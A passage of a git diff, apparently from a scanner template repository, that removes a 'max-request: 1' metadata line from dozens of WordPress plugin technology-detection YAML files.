index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index a038adac53..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - 